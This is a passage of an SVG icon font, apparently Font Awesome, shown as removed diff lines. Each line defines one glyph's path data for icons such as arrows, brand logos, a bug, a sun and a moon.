-<glyph unicode="&#xf168;" horiz-adv-x="1408" d="M597 869q-10 -18 -257 -456q-27 -46 -65 -46h-239q-21 0 -31 17t0 36l253 448q1 0 0 1l-161 279q-12 22 -1 37q9 15 32 15h239q40 0 66 -45zM1403 1511q11 -16 0 -37l-528 -934v-1l336 -615q11 -20 1 -37q-10 -15 -32 -15h-239q-42 0 -66 45l-339 622q18 32 531 942 q25 45 64 45h241q22 0 31 -15z" />
-<glyph unicode="&#xf169;" d="M685 771q0 1 -126 222q-21 34 -52 34h-184q-18 0 -26 -11q-7 -12 1 -29l125 -216v-1l-196 -346q-9 -14 0 -28q8 -13 24 -13h185q31 0 50 36zM1309 1268q-7 12 -24 12h-187q-30 0 -49 -35l-411 -729q1 -2 262 -481q20 -35 52 -35h184q18 0 25 12q8 13 -1 28l-260 476v1 l409 723q8 16 0 28zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf16a;" horiz-adv-x="1792" d="M1280 640q0 37 -30 54l-512 320q-31 20 -65 2q-33 -18 -33 -56v-640q0 -38 33 -56q16 -8 31 -8q20 0 34 10l512 320q30 17 30 54zM1792 640q0 -96 -1 -150t-8.5 -136.5t-22.5 -147.5q-16 -73 -69 -123t-124 -58q-222 -25 -671 -25t-671 25q-71 8 -124.5 58t-69.5 123 q-14 65 -21.5 147.5t-8.5 136.5t-1 150t1 150t8.5 136.5t22.5 147.5q16 73 69 123t124 58q222 25 671 25t671 -25q71 -8 124.5 -58t69.5 -123q14 -65 21.5 -147.5t8.5 -136.5t1 -150z" />
-<glyph unicode="&#xf16b;" horiz-adv-x="1792" d="M402 829l494 -305l-342 -285l-490 319zM1388 274v-108l-490 -293v-1l-1 1l-1 -1v1l-489 293v108l147 -96l342 284v2l1 -1l1 1v-2l343 -284zM554 1418l342 -285l-494 -304l-338 270zM1390 829l338 -271l-489 -319l-343 285zM1239 1418l489 -319l-338 -270l-494 304z" />
-<glyph unicode="&#xf16c;" horiz-adv-x="1408" d="M928 135v-151l-707 -1v151zM1169 481v-701l-1 -35v-1h-1132l-35 1h-1v736h121v-618h928v618h120zM241 393l704 -65l-13 -150l-705 65zM309 709l683 -183l-39 -146l-683 183zM472 1058l609 -360l-77 -130l-609 360zM832 1389l398 -585l-124 -85l-399 584zM1285 1536 l121 -697l-149 -26l-121 697z" />
-<glyph unicode="&#xf16d;" d="M1362 110v648h-135q20 -63 20 -131q0 -126 -64 -232.5t-174 -168.5t-240 -62q-197 0 -337 135.5t-140 327.5q0 68 20 131h-141v-648q0 -26 17.5 -43.5t43.5 -17.5h1069q25 0 43 17.5t18 43.5zM1078 643q0 124 -90.5 211.5t-218.5 87.5q-127 0 -217.5 -87.5t-90.5 -211.5 t90.5 -211.5t217.5 -87.5q128 0 218.5 87.5t90.5 211.5zM1362 1003v165q0 28 -20 48.5t-49 20.5h-174q-29 0 -49 -20.5t-20 -48.5v-165q0 -29 20 -49t49 -20h174q29 0 49 20t20 49zM1536 1211v-1142q0 -81 -58 -139t-139 -58h-1142q-81 0 -139 58t-58 139v1142q0 81 58 139 t139 58h1142q81 0 139 -58t58 -139z" />
-<glyph unicode="&#xf16e;" d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960zM698 640q0 88 -62 150t-150 62t-150 -62t-62 -150t62 -150t150 -62t150 62t62 150zM1262 640q0 88 -62 150 t-150 62t-150 -62t-62 -150t62 -150t150 -62t150 62t62 150z" />
-<glyph unicode="&#xf170;" d="M768 914l201 -306h-402zM1133 384h94l-459 691l-459 -691h94l104 160h522zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf171;" horiz-adv-x="1408" d="M815 677q8 -63 -50.5 -101t-111.5 -6q-39 17 -53.5 58t-0.5 82t52 58q36 18 72.5 12t64 -35.5t27.5 -67.5zM926 698q-14 107 -113 164t-197 13q-63 -28 -100.5 -88.5t-34.5 -129.5q4 -91 77.5 -155t165.5 -56q91 8 152 84t50 168zM1165 1240q-20 27 -56 44.5t-58 22 t-71 12.5q-291 47 -566 -2q-43 -7 -66 -12t-55 -22t-50 -43q30 -28 76 -45.5t73.5 -22t87.5 -11.5q228 -29 448 -1q63 8 89.5 12t72.5 21.5t75 46.5zM1222 205q-8 -26 -15.5 -76.5t-14 -84t-28.5 -70t-58 -56.5q-86 -48 -189.5 -71.5t-202 -22t-201.5 18.5q-46 8 -81.5 18 t-76.5 27t-73 43.5t-52 61.5q-25 96 -57 292l6 16l18 9q223 -148 506.5 -148t507.5 148q21 -6 24 -23t-5 -45t-8 -37zM1403 1166q-26 -167 -111 -655q-5 -30 -27 -56t-43.5 -40t-54.5 -31q-252 -126 -610 -88q-248 27 -394 139q-15 12 -25.5 26.5t-17 35t-9 34t-6 39.5 t-5.5 35q-9 50 -26.5 150t-28 161.5t-23.5 147.5t-22 158q3 26 17.5 48.5t31.5 37.5t45 30t46 22.5t48 18.5q125 46 313 64q379 37 676 -50q155 -46 215 -122q16 -20 16.5 -51t-5.5 -54z" />
-<glyph unicode="&#xf172;" d="M848 666q0 43 -41 66t-77 1q-43 -20 -42.5 -72.5t43.5 -70.5q39 -23 81 4t36 72zM928 682q8 -66 -36 -121t-110 -61t-119 40t-56 113q-2 49 25.5 93t72.5 64q70 31 141.5 -10t81.5 -118zM1100 1073q-20 -21 -53.5 -34t-53 -16t-63.5 -8q-155 -20 -324 0q-44 6 -63 9.5 t-52.5 16t-54.5 32.5q13 19 36 31t40 15.5t47 8.5q198 35 408 1q33 -5 51 -8.5t43 -16t39 -31.5zM1142 327q0 7 5.5 26.5t3 32t-17.5 16.5q-161 -106 -365 -106t-366 106l-12 -6l-5 -12q26 -154 41 -210q47 -81 204 -108q249 -46 428 53q34 19 49 51.5t22.5 85.5t12.5 71z M1272 1020q9 53 -8 75q-43 55 -155 88q-216 63 -487 36q-132 -12 -226 -46q-38 -15 -59.5 -25t-47 -34t-29.5 -54q8 -68 19 -138t29 -171t24 -137q1 -5 5 -31t7 -36t12 -27t22 -28q105 -80 284 -100q259 -28 440 63q24 13 39.5 23t31 29t19.5 40q48 267 80 473zM1536 1120 v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf173;" horiz-adv-x="1024" d="M390 1408h219v-388h364v-241h-364v-394q0 -136 14 -172q13 -37 52 -60q50 -31 117 -31q117 0 232 76v-242q-102 -48 -178 -65q-77 -19 -173 -19q-105 0 -186 27q-78 25 -138 75q-58 51 -79 105q-22 54 -22 161v539h-170v217q91 30 155 84q64 55 103 132q39 78 54 196z " />
-<glyph unicode="&#xf174;" d="M1123 127v181q-88 -56 -174 -56q-51 0 -88 23q-29 17 -39 45q-11 30 -11 129v295h274v181h-274v291h-164q-11 -90 -40 -147t-78 -99q-48 -40 -116 -63v-163h127v-404q0 -78 17 -121q17 -42 59 -78q43 -37 104 -57q62 -20 140 -20q67 0 129 14q57 13 134 49zM1536 1120 v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf175;" horiz-adv-x="768" d="M765 237q8 -19 -5 -35l-350 -384q-10 -10 -23 -10q-14 0 -24 10l-355 384q-13 16 -5 35q9 19 29 19h224v1248q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1248h224q21 0 29 -19z" />
-<glyph unicode="&#xf176;" horiz-adv-x="768" d="M765 1043q-9 -19 -29 -19h-224v-1248q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v1248h-224q-21 0 -29 19t5 35l350 384q10 10 23 10q14 0 24 -10l355 -384q13 -16 5 -35z" />
-<glyph unicode="&#xf177;" horiz-adv-x="1792" d="M1792 736v-192q0 -14 -9 -23t-23 -9h-1248v-224q0 -21 -19 -29t-35 5l-384 350q-10 10 -10 23q0 14 10 24l384 354q16 14 35 6q19 -9 19 -29v-224h1248q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf178;" horiz-adv-x="1792" d="M1728 643q0 -14 -10 -24l-384 -354q-16 -14 -35 -6q-19 9 -19 29v224h-1248q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h1248v224q0 21 19 29t35 -5l384 -350q10 -10 10 -23z" />
-<glyph unicode="&#xf179;" horiz-adv-x="1408" d="M1393 321q-39 -125 -123 -250q-129 -196 -257 -196q-49 0 -140 32q-86 32 -151 32q-61 0 -142 -33q-81 -34 -132 -34q-152 0 -301 259q-147 261 -147 503q0 228 113 374q112 144 284 144q72 0 177 -30q104 -30 138 -30q45 0 143 34q102 34 173 34q119 0 213 -65 q52 -36 104 -100q-79 -67 -114 -118q-65 -94 -65 -207q0 -124 69 -223t158 -126zM1017 1494q0 -61 -29 -136q-30 -75 -93 -138q-54 -54 -108 -72q-37 -11 -104 -17q3 149 78 257q74 107 250 148q1 -3 2.5 -11t2.5 -11q0 -4 0.5 -10t0.5 -10z" />
-<glyph unicode="&#xf17a;" horiz-adv-x="1664" d="M682 530v-651l-682 94v557h682zM682 1273v-659h-682v565zM1664 530v-786l-907 125v661h907zM1664 1408v-794h-907v669z" />
-<glyph unicode="&#xf17b;" horiz-adv-x="1408" d="M493 1053q16 0 27.5 11.5t11.5 27.5t-11.5 27.5t-27.5 11.5t-27 -11.5t-11 -27.5t11 -27.5t27 -11.5zM915 1053q16 0 27 11.5t11 27.5t-11 27.5t-27 11.5t-27.5 -11.5t-11.5 -27.5t11.5 -27.5t27.5 -11.5zM103 869q42 0 72 -30t30 -72v-430q0 -43 -29.5 -73t-72.5 -30 t-73 30t-30 73v430q0 42 30 72t73 30zM1163 850v-666q0 -46 -32 -78t-77 -32h-75v-227q0 -43 -30 -73t-73 -30t-73 30t-30 73v227h-138v-227q0 -43 -30 -73t-73 -30q-42 0 -72 30t-30 73l-1 227h-74q-46 0 -78 32t-32 78v666h918zM931 1255q107 -55 171 -153.5t64 -215.5 h-925q0 117 64 215.5t172 153.5l-71 131q-7 13 5 20q13 6 20 -6l72 -132q95 42 201 42t201 -42l72 132q7 12 20 6q12 -7 5 -20zM1408 767v-430q0 -43 -30 -73t-73 -30q-42 0 -72 30t-30 73v430q0 43 30 72.5t72 29.5q43 0 73 -29.5t30 -72.5z" />
-<glyph unicode="&#xf17c;" d="M663 1125q-11 -1 -15.5 -10.5t-8.5 -9.5q-5 -1 -5 5q0 12 19 15h10zM750 1111q-4 -1 -11.5 6.5t-17.5 4.5q24 11 32 -2q3 -6 -3 -9zM399 684q-4 1 -6 -3t-4.5 -12.5t-5.5 -13.5t-10 -13q-7 -10 -1 -12q4 -1 12.5 7t12.5 18q1 3 2 7t2 6t1.5 4.5t0.5 4v3t-1 2.5t-3 2z M1254 325q0 18 -55 42q4 15 7.5 27.5t5 26t3 21.5t0.5 22.5t-1 19.5t-3.5 22t-4 20.5t-5 25t-5.5 26.5q-10 48 -47 103t-72 75q24 -20 57 -83q87 -162 54 -278q-11 -40 -50 -42q-31 -4 -38.5 18.5t-8 83.5t-11.5 107q-9 39 -19.5 69t-19.5 45.5t-15.5 24.5t-13 15t-7.5 7 q-14 62 -31 103t-29.5 56t-23.5 33t-15 40q-4 21 6 53.5t4.5 49.5t-44.5 25q-15 3 -44.5 18t-35.5 16q-8 1 -11 26t8 51t36 27q37 3 51 -30t4 -58q-11 -19 -2 -26.5t30 -0.5q13 4 13 36v37q-5 30 -13.5 50t-21 30.5t-23.5 15t-27 7.5q-107 -8 -89 -134q0 -15 -1 -15 q-9 9 -29.5 10.5t-33 -0.5t-15.5 5q1 57 -16 90t-45 34q-27 1 -41.5 -27.5t-16.5 -59.5q-1 -15 3.5 -37t13 -37.5t15.5 -13.5q10 3 16 14q4 9 -7 8q-7 0 -15.5 14.5t-9.5 33.5q-1 22 9 37t34 14q17 0 27 -21t9.5 -39t-1.5 -22q-22 -15 -31 -29q-8 -12 -27.5 -23.5 t-20.5 -12.5q-13 -14 -15.5 -27t7.5 -18q14 -8 25 -19.5t16 -19t18.5 -13t35.5 -6.5q47 -2 102 15q2 1 23 7t34.5 10.5t29.5 13t21 17.5q9 14 20 8q5 -3 6.5 -8.5t-3 -12t-16.5 -9.5q-20 -6 -56.5 -21.5t-45.5 -19.5q-44 -19 -70 -23q-25 -5 -79 2q-10 2 -9 -2t17 -19 q25 -23 67 -22q17 1 36 7t36 14t33.5 17.5t30 17t24.5 12t17.5 2.5t8.5 -11q0 -2 -1 -4.5t-4 -5t-6 -4.5t-8.5 -5t-9 -4.5t-10 -5t-9.5 -4.5q-28 -14 -67.5 -44t-66.5 -43t-49 -1q-21 11 -63 73q-22 31 -25 22q-1 -3 -1 -10q0 -25 -15 -56.5t-29.5 -55.5t-21 -58t11.5 -63 q-23 -6 -62.5 -90t-47.5 -141q-2 -18 -1.5 -69t-5.5 -59q-8 -24 -29 -3q-32 31 -36 94q-2 28 4 56q4 19 -1 18l-4 -5q-36 -65 10 -166q5 -12 25 -28t24 -20q20 -23 104 -90.5t93 -76.5q16 -15 17.5 -38t-14 -43t-45.5 -23q8 -15 29 -44.5t28 -54t7 -70.5q46 24 7 92 q-4 8 -10.5 16t-9.5 12t-2 6q3 5 13 9.5t20 -2.5q46 -52 166 -36q133 15 177 87q23 38 34 30q12 -6 10 -52q-1 -25 -23 -92q-9 -23 -6 -37.5t24 -15.5q3 19 14.5 77t13.5 90q2 21 -6.5 73.5t-7.5 97t23 70.5q15 18 51 18q1 37 34.5 53t72.5 10.5t60 -22.5zM626 1152 q3 17 -2.5 30t-11.5 15q-9 2 -9 -7q2 -5 5 -6q10 0 7 -15q-3 -20 8 -20q3 0 3 3zM1045 955q-2 8 -6.5 11.5t-13 5t-14.5 5.5q-5 3 -9.5 8t-7 8t-5.5 6.5t-4 4t-4 -1.5q-14 -16 7 -43.5t39 -31.5q9 -1 14.5 8t3.5 20zM867 1168q0 11 -5 19.5t-11 12.5t-9 3q-14 -1 -7 -7l4 -2 q14 -4 18 -31q0 -3 8 2zM921 1401q0 2 -2.5 5t-9 7t-9.5 6q-15 15 -24 15q-9 -1 -11.5 -7.5t-1 -13t-0.5 -12.5q-1 -4 -6 -10.5t-6 -9t3 -8.5q4 -3 8 0t11 9t15 9q1 1 9 1t15 2t9 7zM1486 60q20 -12 31 -24.5t12 -24t-2.5 -22.5t-15.5 -22t-23.5 -19.5t-30 -18.5 t-31.5 -16.5t-32 -15.5t-27 -13q-38 -19 -85.5 -56t-75.5 -64q-17 -16 -68 -19.5t-89 14.5q-18 9 -29.5 23.5t-16.5 25.5t-22 19.5t-47 9.5q-44 1 -130 1q-19 0 -57 -1.5t-58 -2.5q-44 -1 -79.5 -15t-53.5 -30t-43.5 -28.5t-53.5 -11.5q-29 1 -111 31t-146 43q-19 4 -51 9.5 t-50 9t-39.5 9.5t-33.5 14.5t-17 19.5q-10 23 7 66.5t18 54.5q1 16 -4 40t-10 42.5t-4.5 36.5t10.5 27q14 12 57 14t60 12q30 18 42 35t12 51q21 -73 -32 -106q-32 -20 -83 -15q-34 3 -43 -10q-13 -15 5 -57q2 -6 8 -18t8.5 -18t4.5 -17t1 -22q0 -15 -17 -49t-14 -48 q3 -17 37 -26q20 -6 84.5 -18.5t99.5 -20.5q24 -6 74 -22t82.5 -23t55.5 -4q43 6 64.5 28t23 48t-7.5 58.5t-19 52t-20 36.5q-121 190 -169 242q-68 74 -113 40q-11 -9 -15 15q-3 16 -2 38q1 29 10 52t24 47t22 42q8 21 26.5 72t29.5 78t30 61t39 54q110 143 124 195 q-12 112 -16 310q-2 90 24 151.5t106 104.5q39 21 104 21q53 1 106 -13.5t89 -41.5q57 -42 91.5 -121.5t29.5 -147.5q-5 -95 30 -214q34 -113 133 -218q55 -59 99.5 -163t59.5 -191q8 -49 5 -84.5t-12 -55.5t-20 -22q-10 -2 -23.5 -19t-27 -35.5t-40.5 -33.5t-61 -14 q-18 1 -31.5 5t-22.5 13.5t-13.5 15.5t-11.5 20.5t-9 19.5q-22 37 -41 30t-28 -49t7 -97q20 -70 1 -195q-10 -65 18 -100.5t73 -33t85 35.5q59 49 89.5 66.5t103.5 42.5q53 18 77 36.5t18.5 34.5t-25 28.5t-51.5 23.5q-33 11 -49.5 48t-15 72.5t15.5 47.5q1 -31 8 -56.5 t14.5 -40.5t20.5 -28.5t21 -19t21.5 -13t16.5 -9.5z" />
-<glyph unicode="&#xf17d;" d="M1024 36q-42 241 -140 498h-2l-2 -1q-16 -6 -43 -16.5t-101 -49t-137 -82t-131 -114.5t-103 -148l-15 11q184 -150 418 -150q132 0 256 52zM839 643q-21 49 -53 111q-311 -93 -673 -93q-1 -7 -1 -21q0 -124 44 -236.5t124 -201.5q50 89 123.5 166.5t142.5 124.5t130.5 81 t99.5 48l37 13q4 1 13 3.5t13 4.5zM732 855q-120 213 -244 378q-138 -65 -234 -186t-128 -272q302 0 606 80zM1416 536q-210 60 -409 29q87 -239 128 -469q111 75 185 189.5t96 250.5zM611 1277q-1 0 -2 -1q1 1 2 1zM1201 1132q-185 164 -433 164q-76 0 -155 -19 q131 -170 246 -382q69 26 130 60.5t96.5 61.5t65.5 57t37.5 40.5zM1424 647q-3 232 -149 410l-1 -1q-9 -12 -19 -24.5t-43.5 -44.5t-71 -60.5t-100 -65t-131.5 -64.5q25 -53 44 -95q2 -6 6.5 -17.5t7.5 -16.5q36 5 74.5 7t73.5 2t69 -1.5t64 -4t56.5 -5.5t48 -6.5t36.5 -6 t25 -4.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf17e;" d="M1173 473q0 50 -19.5 91.5t-48.5 68.5t-73 49t-82.5 34t-87.5 23l-104 24q-30 7 -44 10.5t-35 11.5t-30 16t-16.5 21t-7.5 30q0 77 144 77q43 0 77 -12t54 -28.5t38 -33.5t40 -29t48 -12q47 0 75.5 32t28.5 77q0 55 -56 99.5t-142 67.5t-182 23q-68 0 -132 -15.5 t-119.5 -47t-89 -87t-33.5 -128.5q0 -61 19 -106.5t56 -75.5t80 -48.5t103 -32.5l146 -36q90 -22 112 -36q32 -20 32 -60q0 -39 -40 -64.5t-105 -25.5q-51 0 -91.5 16t-65 38.5t-45.5 45t-46 38.5t-54 16q-50 0 -75.5 -30t-25.5 -75q0 -92 122 -157.5t291 -65.5 q73 0 140 18.5t122.5 53.5t88.5 93.5t33 131.5zM1536 256q0 -159 -112.5 -271.5t-271.5 -112.5q-130 0 -234 80q-77 -16 -150 -16q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5q0 73 16 150q-80 104 -80 234q0 159 112.5 271.5t271.5 112.5q130 0 234 -80 q77 16 150 16q143 0 273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -73 -16 -150q80 -104 80 -234z" />
-<glyph unicode="&#xf180;" horiz-adv-x="1664" d="M1483 512l-587 -587q-52 -53 -127.5 -53t-128.5 53l-587 587q-53 53 -53 128t53 128l587 587q53 53 128 53t128 -53l265 -265l-398 -399l-188 188q-42 42 -99 42q-59 0 -100 -41l-120 -121q-42 -40 -42 -99q0 -58 42 -100l406 -408q30 -28 67 -37l6 -4h28q60 0 99 41 l619 619l2 -3q53 -53 53 -128t-53 -128zM1406 1138l120 -120q14 -15 14 -36t-14 -36l-730 -730q-17 -15 -37 -15v0q-4 0 -6 1q-18 2 -30 14l-407 408q-14 15 -14 36t14 35l121 120q13 15 35 15t36 -15l252 -252l574 575q15 15 36 15t36 -15z" />
-<glyph unicode="&#xf181;" d="M704 192v1024q0 14 -9 23t-23 9h-480q-14 0 -23 -9t-9 -23v-1024q0 -14 9 -23t23 -9h480q14 0 23 9t9 23zM1376 576v640q0 14 -9 23t-23 9h-480q-14 0 -23 -9t-9 -23v-640q0 -14 9 -23t23 -9h480q14 0 23 9t9 23zM1536 1344v-1408q0 -26 -19 -45t-45 -19h-1408 q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf182;" horiz-adv-x="1280" d="M1280 480q0 -40 -28 -68t-68 -28q-51 0 -80 43l-227 341h-45v-132l247 -411q9 -15 9 -33q0 -26 -19 -45t-45 -19h-192v-272q0 -46 -33 -79t-79 -33h-160q-46 0 -79 33t-33 79v272h-192q-26 0 -45 19t-19 45q0 18 9 33l247 411v132h-45l-227 -341q-29 -43 -80 -43 q-40 0 -68 28t-28 68q0 29 16 53l256 384q73 107 176 107h384q103 0 176 -107l256 -384q16 -24 16 -53zM864 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
-<glyph unicode="&#xf183;" horiz-adv-x="1024" d="M1024 832v-416q0 -40 -28 -68t-68 -28t-68 28t-28 68v352h-64v-912q0 -46 -33 -79t-79 -33t-79 33t-33 79v464h-64v-464q0 -46 -33 -79t-79 -33t-79 33t-33 79v912h-64v-352q0 -40 -28 -68t-68 -28t-68 28t-28 68v416q0 80 56 136t136 56h640q80 0 136 -56t56 -136z M736 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5z" />
-<glyph unicode="&#xf184;" d="M773 234l350 473q16 22 24.5 59t-6 85t-61.5 79q-40 26 -83 25.5t-73.5 -17.5t-54.5 -45q-36 -40 -96 -40q-59 0 -95 40q-24 28 -54.5 45t-73.5 17.5t-84 -25.5q-46 -31 -60.5 -79t-6 -85t24.5 -59zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103 t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf185;" horiz-adv-x="1792" d="M1472 640q0 117 -45.5 223.5t-123 184t-184 123t-223.5 45.5t-223.5 -45.5t-184 -123t-123 -184t-45.5 -223.5t45.5 -223.5t123 -184t184 -123t223.5 -45.5t223.5 45.5t184 123t123 184t45.5 223.5zM1748 363q-4 -15 -20 -20l-292 -96v-306q0 -16 -13 -26q-15 -10 -29 -4 l-292 94l-180 -248q-10 -13 -26 -13t-26 13l-180 248l-292 -94q-14 -6 -29 4q-13 10 -13 26v306l-292 96q-16 5 -20 20q-5 17 4 29l180 248l-180 248q-9 13 -4 29q4 15 20 20l292 96v306q0 16 13 26q15 10 29 4l292 -94l180 248q9 12 26 12t26 -12l180 -248l292 94 q14 6 29 -4q13 -10 13 -26v-306l292 -96q16 -5 20 -20q5 -16 -4 -29l-180 -248l180 -248q9 -12 4 -29z" />
-<glyph unicode="&#xf186;" d="M1262 233q-54 -9 -110 -9q-182 0 -337 90t-245 245t-90 337q0 192 104 357q-201 -60 -328.5 -229t-127.5 -384q0 -130 51 -248.5t136.5 -204t204 -136.5t248.5 -51q144 0 273.5 61.5t220.5 171.5zM1465 318q-94 -203 -283.5 -324.5t-413.5 -121.5q-156 0 -298 61 t-245 164t-164 245t-61 298q0 153 57.5 292.5t156 241.5t235.5 164.5t290 68.5q44 2 61 -39q18 -41 -15 -72q-86 -78 -131.5 -181.5t-45.5 -218.5q0 -148 73 -273t198 -198t273 -73q118 0 228 51q41 18 72 -13q14 -14 17.5 -34t-4.5 -38z" />
-<glyph unicode="&#xf187;" horiz-adv-x="1792" d="M1088 704q0 26 -19 45t-45 19h-256q-26 0 -45 -19t-19 -45t19 -45t45 -19h256q26 0 45 19t19 45zM1664 896v-960q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v960q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1728 1344v-256q0 -26 -19 -45t-45 -19h-1536 q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1536q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf188;" horiz-adv-x="1664" d="M1632 576q0 -26 -19 -45t-45 -19h-224q0 -171 -67 -290l208 -209q19 -19 19 -45t-19 -45q-18 -19 -45 -19t-45 19l-198 197q-5 -5 -15 -13t-42 -28.5t-65 -36.5t-82 -29t-97 -13v896h-128v-896q-51 0 -101.5 13.5t-87 33t-66 39t-43.5 32.5l-15 14l-183 -207 q-20 -21 -48 -21q-24 0 -43 16q-19 18 -20.5 44.5t15.5 46.5l202 227q-58 114 -58 274h-224q-26 0 -45 19t-19 45t19 45t45 19h224v294l-173 173q-19 19 -19 45t19 45t45 19t45 -19l173 -173h844l173 173q19 19 45 19t45 -19t19 -45t-19 -45l-173 -173v-294h224q26 0 45 -19 t19 -45zM1152 1152h-640q0 133 93.5 226.5t226.5 93.5t226.5 -93.5t93.5 -226.5z" />
-<glyph unicode="&#xf189;" horiz-adv-x="1920" d="M1917 1016q23 -64 -150 -294q-24 -32 -65 -85q-78 -100 -90 -131q-17 -41 14 -81q17 -21 81 -82h1l1 -1l1 -1l2 -2q141 -131 191 -221q3 -5 6.5 -12.5t7 -26.5t-0.5 -34t-25 -27.5t-59 -12.5l-256 -4q-24 -5 -56 5t-52 22l-20 12q-30 21 -70 64t-68.5 77.5t-61 58 t-56.5 15.5q-3 -1 -8 -3.5t-17 -14.5t-21.5 -29.5t-17 -52t-6.5 -77.5q0 -15 -3.5 -27.5t-7.5 -18.5l-4 -5q-18 -19 -53 -22h-115q-71 -4 -146 16.5t-131.5 53t-103 66t-70.5 57.5l-25 24q-10 10 -27.5 30t-71.5 91t-106 151t-122.5 211t-130.5 272q-6 16 -6 27t3 16l4 6 q15 19 57 19l274 2q12 -2 23 -6.5t16 -8.5l5 -3q16 -11 24 -32q20 -50 46 -103.5t41 -81.5l16 -29q29 -60 56 -104t48.5 -68.5t41.5 -38.5t34 -14t27 5q2 1 5 5t12 22t13.5 47t9.5 81t0 125q-2 40 -9 73t-14 46l-6 12q-25 34 -85 43q-13 2 5 24q17 19 38 30q53 26 239 24 q82 -1 135 -13q20 -5 33.5 -13.5t20.5 -24t10.5 -32t3.5 -45.5t-1 -55t-2.5 -70.5t-1.5 -82.5q0 -11 -1 -42t-0.5 -48t3.5 -40.5t11.5 -39t22.5 -24.5q8 -2 17 -4t26 11t38 34.5t52 67t68 107.5q60 104 107 225q4 10 10 17.5t11 10.5l4 3l5 2.5t13 3t20 0.5l288 2 q39 5 64 -2.5t31 -16.5z" />
-<glyph unicode="&#xf18a;" horiz-adv-x="1792" d="M675 252q21 34 11 69t-45 50q-34 14 -73 1t-60 -46q-22 -34 -13 -68.5t43 -50.5t74.5 -2.5t62.5 47.5zM769 373q8 13 3.5 26.5t-17.5 18.5q-14 5 -28.5 -0.5t-21.5 -18.5q-17 -31 13 -45q14 -5 29 0.5t22 18.5zM943 266q-45 -102 -158 -150t-224 -12 q-107 34 -147.5 126.5t6.5 187.5q47 93 151.5 139t210.5 19q111 -29 158.5 -119.5t2.5 -190.5zM1255 426q-9 96 -89 170t-208.5 109t-274.5 21q-223 -23 -369.5 -141.5t-132.5 -264.5q9 -96 89 -170t208.5 -109t274.5 -21q223 23 369.5 141.5t132.5 264.5zM1563 422 q0 -68 -37 -139.5t-109 -137t-168.5 -117.5t-226 -83t-270.5 -31t-275 33.5t-240.5 93t-171.5 151t-65 199.5q0 115 69.5 245t197.5 258q169 169 341.5 236t246.5 -7q65 -64 20 -209q-4 -14 -1 -20t10 -7t14.5 0.5t13.5 3.5l6 2q139 59 246 59t153 -61q45 -63 0 -178 q-2 -13 -4.5 -20t4.5 -12.5t12 -7.5t17 -6q57 -18 103 -47t80 -81.5t34 -116.5zM1489 1046q42 -47 54.5 -108.5t-6.5 -117.5q-8 -23 -29.5 -34t-44.5 -4q-23 8 -34 29.5t-4 44.5q20 63 -24 111t-107 35q-24 -5 -45 8t-25 37q-5 24 8 44.5t37 25.5q60 13 119 -5.5t101 -65.5z M1670 1209q87 -96 112.5 -222.5t-13.5 -241.5q-9 -27 -34 -40t-52 -4t-40 34t-5 52q28 82 10 172t-80 158q-62 69 -148 95.5t-173 8.5q-28 -6 -52 9.5t-30 43.5t9.5 51.5t43.5 29.5q123 26 244 -11.5t208 -134.5z" />
-<glyph unicode="&#xf18b;" d="M1133 -34q-171 -94 -368 -94q-196 0 -367 94q138 87 235.5 211t131.5 268q35 -144 132.5 -268t235.5 -211zM638 1394v-485q0 -252 -126.5 -459.5t-330.5 -306.5q-181 215 -181 495q0 187 83.5 349.5t229.5 269.5t325 137zM1536 638q0 -280 -181 -495 q-204 99 -330.5 306.5t-126.5 459.5v485q179 -30 325 -137t229.5 -269.5t83.5 -349.5z" />
